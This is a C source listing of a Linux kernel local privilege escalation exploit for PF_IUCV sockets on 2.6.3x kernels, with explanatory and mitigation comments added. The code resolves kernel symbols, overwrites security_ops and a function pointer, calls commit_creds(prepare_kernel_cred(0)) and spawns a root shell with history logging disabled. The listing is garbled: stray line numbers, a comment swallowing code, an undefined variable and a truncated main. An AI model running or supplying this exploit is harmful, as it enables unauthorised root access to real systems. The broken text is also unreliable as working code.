/*
 * Linux Kernel <= 2.6.36 PF_IUCV privilege escalation exploit
 * thanks to BCM/ROSe and other bs socket exploits :) -xd
 * Greetz: #Haqnet @ efnet , paralox.org and many other friends who help make my world fun!
 */
  6. #include <stdio.h>
  7. #include <unistd.h>
  8. #include <stdlib.h>
  9. #include <fcntl.h>
  10. #include <sys/types.h>
  11. #include <sys/socket.h>
  12. #include <netinet/in.h>
  13. #include <errno.h>
  14. #include <string.h>
  15. #include <sys/ptrace.h>
  16. #include <sys/utsname.h>
  17.  
  18. #define RECVPORT 12000
  19. #define SENDPORT 12001
  20.  
/* define the socket-family constants for the lame boxes */
  22. #define PF_IUCV AF_IUCV
  23. #define AF_IUCV 32
  24.  
/*
 * Open a PF_IUCV SOCK_SEQPACKET socket and bind it to 127.0.0.1:port.
 *
 * The address is built as a sockaddr_in (the AF_INET layout) but tagged with
 * sin_family = PF_IUCV, so the family field and the address layout disagree.
 * Whether the IUCV socket layer accepts that is not established by this
 * listing; note that main()'s banner still calls the program an "RDS socket
 * exploit", so this looks like a retargeted listing rather than one written
 * against IUCV.
 *
 * Fails hard: any error from socket() or bind() prints a message and calls
 * exit(-1), so callers never see an invalid descriptor.
 *
 * Returns the bound socket descriptor.
 *
 * Detection note: a socket() call with family 32 (AF_IUCV) from an
 * unprivileged process on a host with no reason to use IUCV is itself a
 * reasonable audit signal.
 */
int prep_sock(int port) {
    int s, ret;
    struct sockaddr_in addr;
    s = socket(PF_IUCV, SOCK_SEQPACKET, 0);
    if(s < 0) {
        /* typically EAFNOSUPPORT when the kernel has no IUCV support */
        printf("[*] Could not open socket.\n");
        exit(-1);
    }
    memset(&addr, 0, sizeof(addr));
    addr.sin_addr.s_addr = inet_addr("127.0.0.1");
    addr.sin_family = PF_IUCV;  /* deliberately not AF_INET, despite the sockaddr_in layout */
    addr.sin_port = htons(port);
    ret = bind(s, (struct sockaddr *)&addr, sizeof(addr));
    if(ret < 0) {
        printf("[*] Could not bind socket.\n");
        exit(-1);
    }
    return s;
}
  44.  
/*
 * Receive one word from `sock` straight into the memory at `address`.
 *
 * `address` is an integer reinterpreted as the receive buffer and the length
 * requested is sizeof(void *), i.e. exactly one pointer-sized value.  The
 * recvfrom() result is ignored, so a failed or short receive is
 * indistinguishable from success here; write_to_mem() does not check either.
 *
 * main() passes kernel addresses resolved from the symbol table as `address`.
 * This call therefore does nothing useful unless the socket layer copies into
 * the caller-supplied buffer without validating it -- the missing access
 * check this listing is built around; the listing itself does not show that
 * the IUCV path has that defect.
 */
void get_message(unsigned long address, int sock) {
    recvfrom(sock, (void *)address, sizeof(void *), 0,NULL, NULL);
}
  48.  
/*
 * Send the single word `value` over `sock` to 127.0.0.1:RECVPORT.
 *
 * The destination is a sockaddr_in tagged AF_IUCV (the same layout/family
 * mismatch as in prep_sock()).  The payload is one unsigned long carried in a
 * one-entry iovec; on the usual Linux ABIs its size equals the sizeof(void *)
 * that get_message() requests on the receiving side.
 *
 * `size` is assigned but never read.  Exits the process if sendmsg() fails.
 */
void send_message(unsigned long value, int sock) {
    int size, ret;
    struct sockaddr_in recvaddr;
    struct msghdr msg;
    struct iovec iov;
    unsigned long buf;
    memset(&recvaddr, 0, sizeof(recvaddr));
    size = sizeof(recvaddr);
    recvaddr.sin_port = htons(RECVPORT);
    recvaddr.sin_family = AF_IUCV; /* AF_INET would match the sockaddr_in layout; the author keeps IUCV on purpose */
    recvaddr.sin_addr.s_addr = inet_addr("127.0.0.1");
    memset(&msg, 0, sizeof(msg));
    msg.msg_name = &recvaddr;
    msg.msg_namelen = sizeof(recvaddr);
    msg.msg_iovlen = 1;
    buf = value;
    iov.iov_len = sizeof(buf);    /* one machine word, matching get_message() */
    iov.iov_base = &buf;
    msg.msg_iov = &iov;
    ret = sendmsg(sock, &msg, 0);
    if(ret < 0) {
        printf("[*] Something went wrong sending.\n");
        exit(-1);
    }
}
  74.  
/*
 * Deliver `value` to `addr` by pairing send_message() with get_message().
 *
 * The child sleeps one second and then sends on `sendsock`; the parent goes
 * straight into recvfrom() on `recvsock` with `addr` as its buffer and then
 * reaps the child.  The sleep(1) is the only ordering between the two -- there
 * is no handshake -- so the parent is merely assumed to be blocked in
 * recvfrom() before the datagram arrives.  Neither side reports failure:
 * get_message() ignores recvfrom()'s result and the child's status is
 * discarded by wait(NULL).  A failed fork() (-1) takes the parent branch.
 */
void write_to_mem(unsigned long addr, unsigned long value, int sendsock, int recvsock) {
    if(!fork()) {
        sleep(1);   /* give the parent time to reach recvfrom() */
        send_message(value, sendsock);
        exit(1);
    } else {
        get_message(addr, recvsock);
        wait(NULL);   /* reap the sender; its exit status is ignored */
    }
}
  85.  
/*
 * Function-pointer types for two kernel-internal functions, plus the globals
 * that main() fills in from get_kernel_sym("commit_creds") and
 * get_kernel_sym("prepare_kernel_cred"); both are NULL until then.
 *
 * regparm(3) is the GCC i386 calling convention that passes the first three
 * integer arguments in registers, matching how the 32-bit x86 kernel is
 * built; it is only meaningful on 32-bit x86.  The argument and return
 * types are deliberately opaque (unsigned long in place of whatever pointer
 * type the kernel uses).
 */
typedef int __attribute__((regparm(3))) (* _commit_creds)(unsigned long cred);
typedef unsigned long __attribute__((regparm(3))) (* _prepare_kernel_cred)(unsigned long cred);
_commit_creds commit_creds;
_prepare_kernel_cred prepare_kernel_cred;
  90.  
/*
 * Payload that main() installs in place of a kernel function pointer (the
 * write_to_mem(target, (unsigned long)&getroot, ...) call) so that the kernel
 * invokes it during ptrace(PTRACE_TRACEME).  The two parameters mirror the
 * hooked callback's signature and are unused.  It calls the two resolved
 * kernel functions in the commit_creds(prepare_kernel_cred(0)) pattern and
 * returns -1 so the hooked operation itself fails.  Nothing here checks that
 * either pointer was resolved; main() does that before reaching this point.
 *
 * Mitigation note: this only works if the kernel will execute code at a
 * user-space address.  SMEP (x86) / PXN (ARM) make that fault instead, and
 * making security-ops tables read-only after init removes the writable
 * function pointer this relies on.
 */
int __attribute__((regparm(3)))
getroot(void * file, void * vma) {
    commit_creds(prepare_kernel_cred(0));
    return -1;
}
  96.  
/*
 * Resolve a kernel symbol name to its address using whatever symbol listing
 * this process is allowed to read.
 *
 * Sources, in order:
 *   1. /proc/kallsyms -- three-column "addr type name" lines;
 *   2. /proc/ksyms    -- two-column "addr name" lines (oldstyle = 1);
 *   3. /boot/System.map-<uname -r> (rep = 1), parsed as (1) unless the
 *      release does not start with "2.6", in which case the two-column
 *      parser is used.
 * If neither proc file opens the code jumps to `fallback`; if a proc file
 * opens but does not contain `name`, System.map is tried once (the
 * `if (rep) return 0;` prevents a second fallback).
 *
 * Returns the address, or 0 when the symbol is not found or no listing can
 * be opened.  A listing that shows the symbol with a zeroed address also
 * yields 0.
 *
 * Mitigation note: this resolver depends on unprivileged read access to
 * kernel addresses.  With kptr_restrict set so /proc/kallsyms shows zeroed
 * addresses to unprivileged readers, and /boot/System.map-* readable only by
 * root, every lookup here returns 0 and main() stops at its
 * "Failed to resolve kernel symbols" check.
 *
 * `%s` in the fscanf formats is unbounded; the code relies on symbol names
 * being shorter than sname's 512 bytes.  The sprintf() into sname is bounded
 * in practice by utsname.release being a short fixed-size field.
 */
unsigned long get_kernel_sym(char *name) {
    FILE *f;
    unsigned long addr;
    char dummy;                 /* the one-character symbol-type column */
    char sname[512];
    struct utsname ver;
    int ret;
    int rep = 0;                /* 1 once we are reading System.map */
    int oldstyle = 0;           /* 1 for the two-column format */
    f = fopen("/proc/kallsyms", "r");
    if (f == NULL) {
        f = fopen("/proc/ksyms", "r");
        if (f == NULL)
            goto fallback;
        oldstyle = 1;
    }
repeat:
    ret = 0;
    while(ret != EOF) {
        if (!oldstyle)
            ret = fscanf(f, "%p %c %s\n", (void **)&addr, &dummy, sname);
        else {
            ret = fscanf(f, "%p %s\n", (void **)&addr, sname);
            if (ret == 2) {
                char *p;
                /* entries containing "_O/" or "_S." are skipped (decorated names, presumably) */
                if (strstr(sname, "_O/") || strstr(sname, "_S."))
                    continue;
                /* appears to strip a trailing "..._smp..." style suffix back to the
                 * underscores preceding it -- the exact naming scheme is not shown here */
                p = strrchr(sname, '_');
                if (p > ((char *)sname + 5) && !strncmp(p - 3, "smp", 3)) {
                    p = p - 4;
                    while (p > (char *)sname && *(p - 1) == '_')
                        p--;
                    *p = '\0';
                }
            }
        }
        if (ret == 0) {
            /* line did not match the expected shape: consume one token and move on */
            fscanf(f, "%s\n", sname);
            continue;
        }
        if (!strcmp(name, sname)) {
            fprintf(stdout, " [+] Resolved %s to %p%s\n", name, (void *)addr, rep ? " (via System.map)" : "");
            fclose(f);
            return addr;
        }
    }
    fclose(f);
    if (rep)
        return 0;
fallback:
    uname(&ver);
    if (strncmp(ver.release, "2.6", 3))
        oldstyle = 1;   /* pre-2.6 System.map files use the two-column layout */
    sprintf(sname, "/boot/System.map-%s", ver.release);
    f = fopen(sname, "r");
    if (f == NULL)
        return 0;
    rep = 1;
    goto repeat;
}
  157.  
  158. int main(int argc, char * argv[]) {
  159. unsigned long sec_ops, def_ops, cap_ptrace, target;
  160. int sendsock, recvsock;
  161. struct utsname ver;
  162. printf("[*] Linux kernel >= 2.6.30 RDS socket exploit\n");
  163. uname(&ver);
  164. if(strncmp(ver.release, "2.6.3", 5)) {
  165. printf("[*] Your kernel is not vulnerable.\n");
  166. return -1;
  167. }
  168. printf("[*] Resolving kernel addresses..\n");
  169. sec_ops = get_kernel_sym("security_ops");
  170. def_ops = get_kernel_sym("default_security_ops");
  171. cap_ptrace = get_kernel_sym("cap_ptrace_traceme");
  172. commit_creds = (_commit_creds) get_kernel_sym("commit_creds");
  173. prepare_kernel_cred = (_prepare_kernel_cred) get_kernel_sym("prepare_kernel_cred");
  174. if(!sec_ops || !def_ops || !cap_ptrace || !commit_creds || !prepare_kernel_cred) {
  175. printf("[*] Failed to resolve kernel symbols.\n");
  176. return -1;
  177. }
  178. target = def_ops + sizeof(void *) + ((11 + sizeof(void *)) & ~(sizeof(void *) - 1));
  179. sendsock = prep_sock(SENDPORT);
  180. recvsock = prep_sock(RECVPORT);
  181. printf("[*] Overwriting security ops...\n");
  182. write_to_mem(sec_ops, def_ops, sendsock, recvsock);
  183. printf("[*] Overwriting function pointer...\n");
  184. write_to_mem(target, (unsigned long)&getroot, sendsock, recvsock);
  185. printf("[*] Triggering payload...\n");
  186. ptrace(PTRACE_TRACEME, 1, NULL, NULL);
  187. printf("[*] Restoring function pointer...\n");
  188. write_to_mem(target, cap_ptrace, sendsock, recvsock);
  189. if(getuid()) {
  190. printf("[*] Exploit failed to get root.\n");
  191. return -1;
  192. }                                               // ok here you can do wtf ya want...change it how ya like..enjoy! -xd
  193. else {
  194. printf("[+] Launching rocket!\n");
  195. setresuid(0, 0, 0);
  196. setresgid(0, 0, 0);
  197. if(getuid() == 0) {
  198. pid_t pid;
  199. pid = fork();
  200. if(pid == 0) {
  201. char *envp[] = {"TERM=linux", "BASH_HISTORY=/dev/null", "HISTORY=/dev/null", "history=/dev/null", "HISTFILE=/dev/null", "HISTSIZE=0",   // thx tropic"PATH=/bin:/sbin:/usr/sbin:/usr/bin:/usr/local/bin:/usr/local/sbin", NULL };
  202. execve("/bin/sh","/bin/sh", args, envp);
  203. printf("[*] Got root!\n");
  204. }